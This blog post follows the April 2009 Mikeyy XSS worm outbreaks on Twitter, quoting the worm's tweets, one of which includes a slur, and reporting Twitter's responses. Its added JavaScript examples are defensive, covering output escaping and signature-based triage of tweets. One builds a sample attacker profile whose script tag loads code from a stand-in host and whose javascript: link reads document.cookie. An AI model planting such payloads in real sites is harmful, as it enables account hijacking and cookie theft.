I am disappointed, but not surprised, that Twitter has once again come under XSS attack. Earlier today, a modified version of the Mikeyy worm resurfaced.
Today's attack was a little different. The script was served from the same location, but instead of being merely a general nuisance, this variant directly targeted well-known Twitter users. The messages included:
Twitter, this sucks! Fix your coding.
Twitter Security Team Really? You need to be fired.
Horrible Coding!
@oprah - sup? welcome to twitter. - mikeyy
@aplusk - hey, homo. - mikeyy
@souljaboytellem - your music sucks dude. - mikeyy
@TheEllenShow - hey baby, love me long time? - mikeyy
@StephenColbert - you funny. - mikeyy
@cnnbrk - he's back. - mikeyy
@nytimes - yep, it's true. - mikeyy
Twitter, do you know about the before_save model callback? - mikeyy
This exploit only affects Internet Explorer users. Thanks. - mikeyy
Twitter, BeforeSave: ForEach: DataArray: EscapeHtmlChars!!! - mikeyy
Get Firefox, thanks. www.Firefox.com
Twitter, you should be paying me now. - mikeyy
This is a nasty change in the script, which now targets individual tweeters by name. As before, some of the tweets are designed to look benign, and they have clearly fooled users into re-tweeting them and clicking through to infected profiles. Of more serious concern is that the script appears to target Internet Explorer users and attempts to create ActiveXObjects. ActiveXObject exists only in Internet Explorer and is the hook through which page script can instantiate COM components on the machine (subject to the browser's zone settings), so this raises the concern that the worm may be morphing from a self-propagating nuisance into something that can harm local computers.
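The worm's own messages taunt Twitter about escaping HTML in a before_save callback. The example below is added here and is not code from this post, from Twitter or from the worm; it shows the class of bug a stored-XSS worm needs (a profile field dropped straight into markup) beside the same rendering with output encoding. It encodes at output rather than on save, because data saved once is rendered in many contexts (HTML text, attribute values, JSON for an API) and a single save-time encoding cannot fit all of them, double-encodes on re-save, and does nothing for payloads already stored. The attacker profile, the `http(s)`-only href policy and the function names are assumptions for the example, not a description of Twitter's code.

```javascript
// Added example; not code from the original post, from Twitter or from the worm.
// Renders a profile field with no output encoding (the stored-XSS bug class)
// beside the same rendering with context-appropriate escaping. The attacker
// profile below is constructed for the example and is not the real Mikeyy payload.

const ESCAPE_MAP = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Escape the five characters that can change meaning inside an HTML text
// node or a double-quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ESCAPE_MAP[c]);
}

// Only allow http(s) targets in href: escaping alone does not neutralise a
// javascript: URL, because it is perfectly valid attribute text.
// (Policy chosen for this example; the post does not describe Twitter's URL handling.)
function safeHref(url) {
  return /^https?:\/\/[^\s"'<>]+$/i.test(url) ? escapeHtml(url) : "#";
}

// Vulnerable rendering: stored fields interpolated straight into markup.
function renderProfileUnsafe(profile) {
  return `<div class="bio">${profile.bio}</div>` +
         `<a href="${profile.url}">${profile.url}</a>`;
}

// Hardened rendering: every field encoded at output time for the context it
// lands in (text node, attribute value, URL attribute).
function renderProfileSafe(profile) {
  const bio = escapeHtml(profile.bio);
  const href = safeHref(profile.url);
  return `<div class="bio">${bio}</div>` +
         `<a href="${href}">${escapeHtml(profile.url)}</a>`;
}

// Cheap check used to show the difference: does the rendered markup still
// contain a live <script> tag or a javascript: href?
function hasInjectedScript(html) {
  return /<script[\s>]/i.test(html) || /href="\s*javascript:/i.test(html);
}

// Constructed attacker profile (stand-in for an injected worm loader).
const attackerProfile = {
  bio: '<script src="http://attacker.invalid/worm.js"></script>',
  url: 'javascript:alert(document.cookie)'
};

// Benign profile, to show that encoding does not damage normal data.
const normalProfile = {
  bio: 'Tom & Jerry fan <3',
  url: 'https://example.com/~me'
};

console.log(renderProfileUnsafe(attackerProfile)); // script tag survives intact
console.log(renderProfileSafe(attackerProfile));   // rendered as inert text, href neutralised
console.log(renderProfileSafe(normalProfile));
```

The same escaping must be applied to every field a profile page echoes (name, bio, location, URL, colours), not only the one the current variant abuses; a worm author moves to the next unescaped field as soon as one is fixed.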
In contrast to the earlier attacks, Twitter has been keeping users somewhat informed this time. Only a few hours after the latest worm started to spread the Twitter Status showed:
We are currently addressing a new variant of the Mikeyy worm. Please avoid viewing the profiles of users posting uncharacteristic or otherwise suspicious tweets.
Followed three hours later by this message:
We’re aware of the ongoing spam attack happening on Twitter and we’re working to bring it under control.
@spam, Twitter's anti-spam account, later displayed an update indicating that the latest XSS attack was under control.
JavaScript XSS Attack Vectors are Dangerous
Last week, I posted a guide to how to protect yourself from the StalkDaily/Mikeyy worm in my post called StalkDaily Twitter XSS - Lessons Learned.
The same advice applies to the latest variant and will probably protect you from most future variants as well.
UPDATE
19th April, 2009
This is getting repetitive and boring! Today, the Mikeyy script morphed again and bombarded Twitter streams with jokes. This is, however, no joke. All the wormy messages ended with, "Womp. mikeyy" and, as usual, thousands of people re-tweeted these inane tweets.
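Because every wormy tweet in this variant ends with the same signature, and the earlier ones all ended with "- mikeyy", a stream can at least be triaged by that trailing text and the retweets that amplified it separated from the accounts that actually posted it. The example below is added here and is not code from this post or from Twitter; the tweets are constructed samples, the signature pattern is an assumption based on the messages quoted above, and, since the attacker chooses that string, this is incident triage rather than a durable detection.

```javascript
// Added example, not code from the original post or from Twitter. Flags tweets
// carrying the worm's trailing signature ("- mikeyy" / "Womp. mikeyy") and
// separates originals from the retweets that amplified them. The tweets are
// constructed samples, not captured Twitter data.

// Signature forms seen in the variants quoted in the post. A signature chosen
// by the attacker is trivially changed, so this is triage, not detection.
const WORM_SIGNATURE = /(?:womp\.?|-)\s*mikeyy\s*$/i;

// 2009-style manual retweet prefix: "RT @user: text".
const RETWEET_PREFIX = /^RT\s+@\w+:?\s*/i;

function isWormTweet(text) {
  return WORM_SIGNATURE.test(text.trim());
}

// Returns the retweeted body if the tweet is a manual retweet, else null.
function retweetBody(text) {
  const trimmed = text.trim();
  const m = RETWEET_PREFIX.exec(trimmed);
  return m ? trimmed.slice(m[0].length) : null;
}

// Sort a batch of tweets into worm originals, amplifying retweets and clean.
// Retweets are checked first: a retweet of a worm tweet also ends with the
// signature, but its author is a victim of the spread, not of the XSS.
function triage(tweets) {
  const result = { original: [], retweet: [], clean: [] };
  for (const t of tweets) {
    const body = retweetBody(t.text);
    if (body !== null && isWormTweet(body)) result.retweet.push(t.id);
    else if (isWormTweet(t.text)) result.original.push(t.id);
    else result.clean.push(t.id);
  }
  return result;
}

// Accounts whose own (non-retweet) tweets carry the signature are the ones
// whose profiles should not be opened with scripting enabled.
function infectedAccounts(tweets) {
  const ids = new Set(triage(tweets).original);
  return [...new Set(tweets.filter((t) => ids.has(t.id)).map((t) => t.user))];
}

// Constructed sample stream.
const SAMPLE_TWEETS = [
  { id: 1, user: "victim1", text: "Why did the chicken cross the road? To get to the other side. Womp. mikeyy" },
  { id: 2, user: "fan",     text: "RT @victim1: Why did the chicken cross the road? To get to the other side. Womp. mikeyy" },
  { id: 3, user: "victim2", text: "@cnnbrk - he's back. - mikeyy" },
  { id: 4, user: "watcher", text: "Mikeyy is at it again, do not click on profiles" },
  { id: 5, user: "someone", text: "Lunch was great today" },
  { id: 6, user: "victim1", text: "Twitter, you should be paying me now. - mikeyy" },
];

console.log(triage(SAMPLE_TWEETS));
console.log(infectedAccounts(SAMPLE_TWEETS));
```

Tweet 4 mentions the worm by name but does not carry the signature, so it stays clean; matching on the word "mikeyy" anywhere would flag every user warning others about it.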
A few hours ago, Twitter's @spam reported:
Currently, everything seems under control; we still recommend not clicking on suspicious links as a general practice.
Twitter's idea of getting things under control seems to amount to cleaning up the tweets and profiles from the latest attack without actually closing the holes that let the script in.
What to do if your Twitter account appears to have been hacked?
Twitter has posted information here. If your profile has been hacked by these Mikeyy attacks and you are having difficulty cleaning it, go to Twitter Help and open a support ticket.
20th April, 2009
Here we go again! For information about the latest worm, please see "Mikey and the Mysterious Treqz" on the F-Secure blog. I've lost patience with Mikeyy and Twitter's inability to close these holes.
Stay safe and do NOT visit Twitter user profiles with scripting enabled in your browser!